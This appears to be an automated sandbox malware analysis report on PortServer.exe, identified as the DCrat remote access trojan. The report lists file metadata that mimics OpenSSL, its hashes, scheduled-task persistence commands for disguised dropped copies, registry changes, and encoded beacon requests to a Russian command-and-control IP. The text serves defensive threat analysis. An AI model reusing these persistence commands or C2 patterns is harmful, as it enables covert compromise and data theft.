File name: | PortServer.exe |
Full analysis: | https://app.any.run/tasks/4f57a3f2-8935-4436-b054-0cbe5bfd5abe |
Verdict: | Malicious activity |
Threats: | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. |
Analysis date: | March 31, 2023, 21:38:02 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
MD5: | BD911C117FF69048AF2D7781FB01023C |
SHA1: | 398DA53BFF5298977A917732E76566C766B85F2B |
SHA256: | E5E17B6063741428E5820D3CA238CE40F8F04DF4587F6D7DC46E0A34C5EDF08E |
SSDEEP: | 49152:afTJwgpVFnuljVVjuMNMLZLzXYqs181OPJf2dTiCs93:afmI2TNoMd8s+til |
.exe | | | Generic CIL Executable (.NET, Mono, etc.) (45.1) |
---|---|---|
.exe | | | Win32 Executable MS Visual C++ (generic) (19.2) |
.exe | | | Win64 Executable (generic) (17) |
.scr | | | Windows screen saver (8) |
.dll | | | Win32 Dynamic Link Library (generic) (4) |
LegalCopyright: | Copyright 1998-2022 The OpenSSL Authors. All rights reserved. |
---|---|
ProductVersion: | 1.1.1o |
ProductName: | - |
OriginalFileName: | libcrypto |
InternalName: | libcrypto |
FileVersion: | 1.1.1o |
FileDescription: | - |
CompanyName: | - |
CharacterSet: | Unicode |
LanguageCode: | English (U.S.) |
FileSubtype: | - |
ObjectFileType: | Dynamic link library |
FileOS: | Win32 |
FileFlags: | (none) |
FileFlagsMask: | 0x003f |
ProductVersionNumber: | 1.1.1.15 |
FileVersionNumber: | 1.1.1.15 |
Subsystem: | Windows GUI |
SubsystemVersion: | 4 |
ImageVersion: | - |
OSVersion: | 4 |
EntryPoint: | 0x2bfd3e |
UninitializedDataSize: | - |
InitializedDataSize: | 13824 |
CodeSize: | 2874880 |
LinkerVersion: | 6 |
PEType: | PE32 |
ImageFileCharacteristics: | Executable, No line numbers, No symbols, Large address aware, 32-bit |
TimeStamp: | 2022:07:24 15:13:08+00:00 |
MachineType: | Intel 386 or later, and compatibles |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 24-Jul-2022 15:13:08 |
Detected languages: |
|
CompanyName: | - |
FileDescription: | - |
FileVersion: | 1.1.1o |
InternalName: | libcrypto |
OriginalFilename: | libcrypto |
ProductName: | - |
ProductVersion: | 1.1.1o |
LegalCopyright: | Copyright 1998-2022 The OpenSSL Authors. All rights reserved. |
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000080 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 4 |
Time date stamp: | 24-Jul-2022 15:13:08 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
.text | 0x00002000 | 0x002BDD44 | 0x002BDE00 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 7.71326 |
.sdata | 0x002C0000 | 0x00002FDF | 0x00003000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.24284 |
.rsrc | 0x002C4000 | 0x0000031C | 0x00000400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 2.64412 |
.reloc | 0x002C6000 | 0x0000000C | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 0.10191 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 3.33524 | 708 | UNKNOWN | English - United States | RT_VERSION |
mscoree.dll |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1900 | "C:\Users\admin\AppData\Local\Temp\PortServer.exe" | C:\Users\admin\AppData\Local\Temp\PortServer.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Version: 1.1.1o Modules
| |||||||||||||||
3240 | schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-006E-0410-0000-0000000FF1CE}-C\1040\System.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3332 | schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-006E-0410-0000-0000000FF1CE}-C\1040\System.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3516 | schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-006E-0410-0000-0000000FF1CE}-C\1040\System.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3644 | schtasks.exe /create /tn "SearchFilterHostS" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-001A-0410-0000-0000000FF1CE}-C\SearchFilterHost.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3748 | schtasks.exe /create /tn "SearchFilterHost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001A-0410-0000-0000000FF1CE}-C\SearchFilterHost.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3856 | schtasks.exe /create /tn "SearchFilterHostS" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-001A-0410-0000-0000000FF1CE}-C\SearchFilterHost.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
4044 | schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Users\admin\NetHood\System.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
1940 | schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\admin\NetHood\System.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
1832 | schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 8 /tr "'C:\Users\admin\NetHood\System.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
(PID) Process: | (1900) PortServer.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (1900) PortServer.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (1900) PortServer.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (1900) PortServer.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1900 | PortServer.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\System.exe | executable | |
MD5:BD911C117FF69048AF2D7781FB01023C | SHA256:E5E17B6063741428E5820D3CA238CE40F8F04DF4587F6D7DC46E0A34C5EDF08E | |||
1900 | PortServer.exe | C:\MSOCache\All Users\{90140000-001A-0410-0000-0000000FF1CE}-C\SearchFilterHost.exe | executable | |
MD5:BD911C117FF69048AF2D7781FB01023C | SHA256:E5E17B6063741428E5820D3CA238CE40F8F04DF4587F6D7DC46E0A34C5EDF08E | |||
1900 | PortServer.exe | C:\MSOCache\All Users\{90140000-006E-0410-0000-0000000FF1CE}-C\1040\System.exe | executable | |
MD5:BD911C117FF69048AF2D7781FB01023C | SHA256:E5E17B6063741428E5820D3CA238CE40F8F04DF4587F6D7DC46E0A34C5EDF08E | |||
1900 | PortServer.exe | C:\MSOCache\All Users\{90140000-006E-0410-0000-0000000FF1CE}-C\1040\27d1bcfc3c54e0 | text | |
MD5:C06DC3E7942223E565CDBADD631CE76F | SHA256:3F5D54F7C1D7916D394BCEC6D01AF2B3CD223B587FB89F136877B57D613A9ECF | |||
1900 | PortServer.exe | C:\MSOCache\All Users\{90140000-001B-0416-0000-0000000FF1CE}-C\taskhost.exe | executable | |
MD5:BD911C117FF69048AF2D7781FB01023C | SHA256:E5E17B6063741428E5820D3CA238CE40F8F04DF4587F6D7DC46E0A34C5EDF08E | |||
1900 | PortServer.exe | C:\MSOCache\All Users\{90140000-001A-0410-0000-0000000FF1CE}-C\617403385cfa57 | text | |
MD5:91917EE70B12F30AB6F6A66AF705222E | SHA256:21E7D97EFFC999448A1A0DC4DBA9AE88070095FBFA90F895DECB38147737A6D9 | |||
1900 | PortServer.exe | C:\MSOCache\All Users\{90140000-001B-0416-0000-0000000FF1CE}-C\b75386f1303e64 | text | |
MD5:1FA5E791D075038666676353CA33FC8D | SHA256:20A2AC38CB8E7925BED600D46C1658E4D5272795DC177DA4645B1A80975077EB | |||
1900 | PortServer.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\27d1bcfc3c54e0 | text | |
MD5:D8DCD6DD8920232554D57A7D7A433054 | SHA256:0AF09148DB661B0D96FE65DC285D801962E2DB86917242A0D0D0FCEABB4FB901 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2908 | System.exe | GET | 200 | 193.57.137.82:80 | http://193.57.137.82/toToBase/18/wpProvider/Low/universalLineCdnvm/image/cpuupdateTestwpprivate.php?A9llLzRx5EcDoTeCQZUNS=MGkQ8U01xjNnGM38uG2CmhKE0O&d3065683d0e3df5734083078686c8e68=wMjFGZ3ITY5EzM4MWYkZjMhBDO0ATMyUWOhJWYmVTZwEDM4ATYmBTO0czN4IDOwkDOyADNwAzN&9f5acab47885c56ec315290a03f1fd28=gNhZjY0Q2MlFjZ3QGNkVWNhNjY2ADZllzM5UzYwcDM1MTY0E2Y0MTM&966e1973ff4305e4d38988c7900c80d5=d1nIVtGVQJFMJJiOikTYxMGOzcTN3QTZwQGZ0UTN4gTOzEzN4MzM1QGN4YWNiwiIhJGM1ATZjVDZ5MGN0YjYwUWM2gjNhZDZlhTNmhjY4EzYjBjY2QmN4IiOikDZ4IjY0UzMkR2Y3EjY0YTM2MTOyUTM1QGOxYzNyYTMiwiIhJWMkVDOlFWOxQDZiNTZ2YmNxYGOkZjY2YGNwYDMjZjMiRWYyIjY5IiOiYzMhhjYwAjMyQzY2MmMxgjYjFjZ1QmYkRWOhZzNhJ2Mis3W | RU | — | — | malicious |
2908 | System.exe | GET | 200 | 193.57.137.82:80 | http://193.57.137.82/toToBase/18/wpProvider/Low/universalLineCdnvm/image/cpuupdateTestwpprivate.php?A9llLzRx5EcDoTeCQZUNS=MGkQ8U01xjNnGM38uG2CmhKE0O&d3065683d0e3df5734083078686c8e68=wMjFGZ3ITY5EzM4MWYkZjMhBDO0ATMyUWOhJWYmVTZwEDM4ATYmBTO0czN4IDOwkDOyADNwAzN&9f5acab47885c56ec315290a03f1fd28=gNhZjY0Q2MlFjZ3QGNkVWNhNjY2ADZllzM5UzYwcDM1MTY0E2Y0MTM&966e1973ff4305e4d38988c7900c80d5=0VfiIiOikTYxMGOzcTN3QTZwQGZ0UTN4gTOzEzN4MzM1QGN4YWNiwiI5Y2YmFTO0UWYlFmN1M2Y3ImYxMDMxgzNkFTMjRmN1UTYjdzY5QGM0IiOikDZ4IjY0UzMkR2Y3EjY0YTM2MTOyUTM1QGOxYzNyYTMiwiIhJWMkVDOlFWOxQDZiNTZ2YmNxYGOkZjY2YGNwYDMjZjMiRWYyIjY5IiOiYzMhhjYwAjMyQzY2MmMxgjYjFjZ1QmYkRWOhZzNhJ2Mis3W | RU | — | — | malicious |
2908 | System.exe | GET | 200 | 193.57.137.82:80 | http://193.57.137.82/toToBase/18/wpProvider/Low/universalLineCdnvm/image/cpuupdateTestwpprivate.php?vsINVLxfA4077DR30ANRISpNUPMo=gatw7FEa9S5ZY7zP5FiQQNzBRudD53&8Jje=HKA7Md1rR1tUz7YK&dc1acbbb508ecb7fa347f9be16b556df=97de41ca2baa1b45bc397293625170ce&9f5acab47885c56ec315290a03f1fd28=QOxQjMhFmMxMTNwgDM0MzM4IWZ5cDMxE2MyEjMhdjNxMmZ1cjYhNzY&vsINVLxfA4077DR30ANRISpNUPMo=gatw7FEa9S5ZY7zP5FiQQNzBRudD53&8Jje=HKA7Md1rR1tUz7YK | RU | text | 2.07 Kb | malicious |
2908 | System.exe | GET | 200 | 193.57.137.82:80 | http://193.57.137.82/toToBase/18/wpProvider/Low/universalLineCdnvm/image/cpuupdateTestwpprivate.php?A9llLzRx5EcDoTeCQZUNS=MGkQ8U01xjNnGM38uG2CmhKE0O&d3065683d0e3df5734083078686c8e68=wMjFGZ3ITY5EzM4MWYkZjMhBDO0ATMyUWOhJWYmVTZwEDM4ATYmBTO0czN4IDOwkDOyADNwAzN&9f5acab47885c56ec315290a03f1fd28=gNhZjY0Q2MlFjZ3QGNkVWNhNjY2ADZllzM5UzYwcDM1MTY0E2Y0MTM&b2bbd2c9060c13f0ce6dbac4c6f4a030=d1nIyczM2IGZlRWOyQDNhNWNxADZ4gjZllDZ3EWYzATNlhjZ1UjN2U2NjJiOikDZ4IjY0UzMkR2Y3EjY0YTM2MTOyUTM1QGOxYzNyYTMiwiIhJWMkVDOlFWOxQDZiNTZ2YmNxYGOkZjY2YGNwYDMjZjMiRWYyIjY5IiOiYzMhhjYwAjMyQzY2MmMxgjYjFjZ1QmYkRWOhZzNhJ2Mis3W&966e1973ff4305e4d38988c7900c80d5=d1nIiojI5EWMjhzM3UzN0UGMkRGN1UDO4kzMxcDOzMTNkRDOmVjIsIiM3MjNiRWZkljM0QTYjVTMwQGO4YWZ5Q2NhF2MwUTZ4YWN1YjNldzYiojI5QGOyIGN1MDZkN2NxIGN2EjNzkjM1ETNkhTM2cjM2EjIsISYiFDZ1gTZhlTM0QmYzUmNmZTMmhDZ2ImNmRDM2AzY2IjYkFmMyIWOiojI2MTY4IGMwIjM0MmNjJTM4I2YxYWNkJGZklTY2cTYiNjI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSspFWhBjTXFVavpWS6ZFSkhmUzUVNShVYyw2RkpmRrl0cJl2YsR2VZVnRXR1ZwcVW5RmMilnQslkNJlHZ2JVbiBHZGZFRGtWSzlUaUl2bqlEdGJTWpZlMWpHbtl0cJN1Vp9maJxWNyI2bCNjY550Vh5kTYFWa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFTUpdXaJBHNyQmd1ITY1ZlRLdGNyQmd1ITY1ZFbJZTSTpFdG1GVWJUMSl2dpl0TKl2TpRzVhRnUXFles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlUeNRUSzZUbiZHbyMmeW1mW2pESVd2YElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKNVW1VzVaBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwpESkpnVYF1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWSq5kMNpGTyUERMVTUE1Ue0M0TwkUaPlWTyI2cKNETpFlVRl2bqlUNKhEZ1Z1MipmSDxUaF1mY1Z1VhdlSp9Ua0IjYwR2ValnSDxUaF1mY1Z1VhdlSp9UarhEZw5UbJNXS51Ue0kXTwkkaMFzaqxUMRpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOikTYxMGOzcTN3QTZwQGZ0UTN4gTOzEzN4MzM1QGN4YWNiwiI0QjZjhTZjdDZ4QGMklDMhNGM1Q2MxYWZ2cDMzIGMkhzM4YzN5cTNyIiOikDZ4IjY0UzMkR2Y3EjY0YTM2MTOyUTM1QGOxYzNyYTMiwiIhJWMkVDOlFWOxQDZiNTZ2YmNxYGOkZjY2YGNwYDMjZjMiRWYyIjY5IiOiYzMhhjYwAjMyQzY2MmMxgjYjFjZ1QmYkRWOhZzNhJ2Mis3W | RU | text | 104 b | malicious |
2908 | System.exe | GET | 200 | 193.57.137.82:80 | http://193.57.137.82/toToBase/18/wpProvider/Low/universalLineCdnvm/image/cpuupdateTestwpprivate.php?A9llLzRx5EcDoTeCQZUNS=MGkQ8U01xjNnGM38uG2CmhKE0O&d3065683d0e3df5734083078686c8e68=wMjFGZ3ITY5EzM4MWYkZjMhBDO0ATMyUWOhJWYmVTZwEDM4ATYmBTO0czN4IDOwkDOyADNwAzN&9f5acab47885c56ec315290a03f1fd28=gNhZjY0Q2MlFjZ3QGNkVWNhNjY2ADZllzM5UzYwcDM1MTY0E2Y0MTM&966e1973ff4305e4d38988c7900c80d5=QX9JSUNJiOikTYxMGOzcTN3QTZwQGZ0UTN4gTOzEzN4MzM1QGN4YWNiwiIxcDM1MGNzYDZ5MDNkRWM2U2YzUDNmRGNjVTNzATY1kTMkVjYlZDO5IiOikDZ4IjY0UzMkR2Y3EjY0YTM2MTOyUTM1QGOxYzNyYTMiwiIhJWMkVDOlFWOxQDZiNTZ2YmNxYGOkZjY2YGNwYDMjZjMiRWYyIjY5IiOiYzMhhjYwAjMyQzY2MmMxgjYjFjZ1QmYkRWOhZzNhJ2Mis3W | RU | text | 104 b | malicious |
2908 | System.exe | GET | 200 | 193.57.137.82:80 | http://193.57.137.82/toToBase/18/wpProvider/Low/universalLineCdnvm/image/cpuupdateTestwpprivate.php?A9llLzRx5EcDoTeCQZUNS=MGkQ8U01xjNnGM38uG2CmhKE0O&d3065683d0e3df5734083078686c8e68=wMjFGZ3ITY5EzM4MWYkZjMhBDO0ATMyUWOhJWYmVTZwEDM4ATYmBTO0czN4IDOwkDOyADNwAzN&9f5acab47885c56ec315290a03f1fd28=gNhZjY0Q2MlFjZ3QGNkVWNhNjY2ADZllzM5UzYwcDM1MTY0E2Y0MTM&bd8359c2de05d0b249580583234be0d9=0VfiElZpFlMiZHaFRGb1UEWjVzVhRnUXl1Y4FzY5ZlMjZFeGhlNNtWS2k0QhBjRHVVa3lWS1R2MiVHdtJmVKl2Tpd2RkhmQGpVe5ITW6x2RSl2dplUavpWSvJFWZFVMXlVekdlWzZ1RWl2dplUavpWS6JESjJUMXlFbSNTVpdXaJVHZzIWd01mYWpUaPlWUVNVeWJzYWFzVZxmUzUVa3lWS6ljMaBnSIpFaKNDWzZ1VhlnSXllbKl2TplEWapnVWJGaWdEZUp0QMNHeXRWdwpWSuVzVZ1UMXlFbSNTVpdXaJRnRXpFMONDT6Z1RiBnWHlEdG12YulTbjdXOp9kaKl2Tpd2RkhmQWJGaWdEZUp0QMl2a5JGcSdFZCJUeOVzY5FlQClXYsJFSihmVtV1bBlmYKJ0UaVHbHRVd4x2YjlzVhtmVYF1ZjR1Tu1UVRd2cXpFM4dVWspkRLdWVtJmdod0Y2p0MZBXMrlkNJl3YsVjMi9mQzIWeOdVYOp0QMlWSp9UaNhlYo5UbZxGZsl0cJlmYjpESYh3aWFVTCFTVKJVRYNWNDh1Y4ZEWp9maJpXNXpFbKNTWUp0QMlWSqxUM0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOikTYxMGOzcTN3QTZwQGZ0UTN4gTOzEzN4MzM1QGN4YWNiwiI5Y2YmFTO0UWYlFmN1M2Y3ImYxMDMxgzNkFTMjRmN1UTYjdzY5QGM0IiOikDZ4IjY0UzMkR2Y3EjY0YTM2MTOyUTM1QGOxYzNyYTMiwiIhJWMkVDOlFWOxQDZiNTZ2YmNxYGOkZjY2YGNwYDMjZjMiRWYyIjY5IiOiYzMhhjYwAjMyQzY2MmMxgjYjFjZ1QmYkRWOhZzNhJ2Mis3W | RU | text | 336 b | malicious |
2908 | System.exe | GET | 200 | 193.57.137.82:80 | http://193.57.137.82/toToBase/18/wpProvider/Low/universalLineCdnvm/image/cpuupdateTestwpprivate.php?A9llLzRx5EcDoTeCQZUNS=MGkQ8U01xjNnGM38uG2CmhKE0O&d3065683d0e3df5734083078686c8e68=wMjFGZ3ITY5EzM4MWYkZjMhBDO0ATMyUWOhJWYmVTZwEDM4ATYmBTO0czN4IDOwkDOyADNwAzN&9f5acab47885c56ec315290a03f1fd28=gNhZjY0Q2MlFjZ3QGNkVWNhNjY2ADZllzM5UzYwcDM1MTY0E2Y0MTM&b2bbd2c9060c13f0ce6dbac4c6f4a030=d1nIyczM2IGZlRWOyQDNhNWNxADZ4gjZllDZ3EWYzATNlhjZ1UjN2U2NjJiOikDZ4IjY0UzMkR2Y3EjY0YTM2MTOyUTM1QGOxYzNyYTMiwiIhJWMkVDOlFWOxQDZiNTZ2YmNxYGOkZjY2YGNwYDMjZjMiRWYyIjY5IiOiYzMhhjYwAjMyQzY2MmMxgjYjFjZ1QmYkRWOhZzNhJ2Mis3W&966e1973ff4305e4d38988c7900c80d5=d1nIiojI5EWMjhzM3UzN0UGMkRGN1UDO4kzMxcDOzMTNkRDOmVjIsIiM3MjNiRWZkljM0QTYjVTMwQGO4YWZ5Q2NhF2MwUTZ4YWN1YjNldzYiojI5QGOyIGN1MDZkN2NxIGN2EjNzkjM1ETNkhTM2cjM2EjIsISYiFDZ1gTZhlTM0QmYzUmNmZTMmhDZ2ImNmRDM2AzY2IjYkFmMyIWOiojI2MTY4IGMwIjM0MmNjJTM4I2YxYWNkJGZklTY2cTYiNjI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSspFWhBjTXFVavpWS6ZFSkhmUzUVNShVYyw2RkpmRrl0cJl2YsR2VZVnRXR1ZwcVW5RmMilnQslkNJlHZ2JVbiBHZGZFRGtWSzlUaUl2bqlEdGJTWpZlMWpHbtl0cJN1Vp9maJxWNyI2bCNjY550Vh5kTYFWa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFTUpdXaJBHNyQmd1ITY1ZlRLdGNyQmd1ITY1ZFbJZTSTpFdG1GVWJUMSl2dpl0TKl2TpRzVhRnUXFles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlUeNRUSzZUbiZHbyMmeW1mW2pESVd2YElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKNVW1VzVaBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwpESkpnVYF1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWSq5kMNpGTyUERMVTUE1Ue0M0TwkUaPlWTyI2cKNETpFlVRl2bqlUNKhEZ1Z1MipmSDxUaF1mY1Z1VhdlSp9Ua0IjYwR2ValnSDxUaF1mY1Z1VhdlSp9UarhEZw5UbJNXS51Ue0kXTwkkaMFzaqxUMRpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOikTYxMGOzcTN3QTZwQGZ0UTN4gTOzEzN4MzM1QGN4YWNiwiI0QjZjhTZjdDZ4QGMklDMhNGM1Q2MxYWZ2cDMzIGMkhzM4YzN5cTNyIiOikDZ4IjY0UzMkR2Y3EjY0YTM2MTOyUTM1QGOxYzNyYTMiwiIhJWMkVDOlFWOxQDZiNTZ2YmNxYGOkZjY2YGNwYDMjZjMiRWYyIjY5IiOiYzMhhjYwAjMyQzY2MmMxgjYjFjZ1QmYkRWOhZzNhJ2Mis3W | RU | text | 104 b | malicious |
2908 | System.exe | POST | 200 | 193.57.137.82:80 | http://193.57.137.82/toToBase/18/wpProvider/Low/universalLineCdnvm/image/cpuupdateTestwpprivate.php?A9llLzRx5EcDoTeCQZUNS=MGkQ8U01xjNnGM38uG2CmhKE0O&d3065683d0e3df5734083078686c8e68=wMjFGZ3ITY5EzM4MWYkZjMhBDO0ATMyUWOhJWYmVTZwEDM4ATYmBTO0czN4IDOwkDOyADNwAzN&9f5acab47885c56ec315290a03f1fd28=gNhZjY0Q2MlFjZ3QGNkVWNhNjY2ADZllzM5UzYwcDM1MTY0E2Y0MTM | RU | text | 104 b | malicious |
2908 | System.exe | POST | 200 | 193.57.137.82:80 | http://193.57.137.82/toToBase/18/wpProvider/Low/universalLineCdnvm/image/cpuupdateTestwpprivate.php?A9llLzRx5EcDoTeCQZUNS=MGkQ8U01xjNnGM38uG2CmhKE0O&d3065683d0e3df5734083078686c8e68=wMjFGZ3ITY5EzM4MWYkZjMhBDO0ATMyUWOhJWYmVTZwEDM4ATYmBTO0czN4IDOwkDOyADNwAzN&9f5acab47885c56ec315290a03f1fd28=gNhZjY0Q2MlFjZ3QGNkVWNhNjY2ADZllzM5UzYwcDM1MTY0E2Y0MTM | RU | text | 336 b | malicious |
2908 | System.exe | GET | 200 | 193.57.137.82:80 | http://193.57.137.82/toToBase/18/wpProvider/Low/universalLineCdnvm/image/cpuupdateTestwpprivate.php?A9llLzRx5EcDoTeCQZUNS=MGkQ8U01xjNnGM38uG2CmhKE0O&d3065683d0e3df5734083078686c8e68=wMjFGZ3ITY5EzM4MWYkZjMhBDO0ATMyUWOhJWYmVTZwEDM4ATYmBTO0czN4IDOwkDOyADNwAzN&9f5acab47885c56ec315290a03f1fd28=gNhZjY0Q2MlFjZ3QGNkVWNhNjY2ADZllzM5UzYwcDM1MTY0E2Y0MTM&b2bbd2c9060c13f0ce6dbac4c6f4a030=d1nIyczM2IGZlRWOyQDNhNWNxADZ4gjZllDZ3EWYzATNlhjZ1UjN2U2NjJiOikDZ4IjY0UzMkR2Y3EjY0YTM2MTOyUTM1QGOxYzNyYTMiwiIhJWMkVDOlFWOxQDZiNTZ2YmNxYGOkZjY2YGNwYDMjZjMiRWYyIjY5IiOiYzMhhjYwAjMyQzY2MmMxgjYjFjZ1QmYkRWOhZzNhJ2Mis3W&966e1973ff4305e4d38988c7900c80d5=d1nIiojI5EWMjhzM3UzN0UGMkRGN1UDO4kzMxcDOzMTNkRDOmVjIsIiM3MjNiRWZkljM0QTYjVTMwQGO4YWZ5Q2NhF2MwUTZ4YWN1YjNldzYiojI5QGOyIGN1MDZkN2NxIGN2EjNzkjM1ETNkhTM2cjM2EjIsISYiFDZ1gTZhlTM0QmYzUmNmZTMmhDZ2ImNmRDM2AzY2IjYkFmMyIWOiojI2MTY4IGMwIjM0MmNjJTM4I2YxYWNkJGZklTY2cTYiNjI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSspFWhBjTXFVavpWS6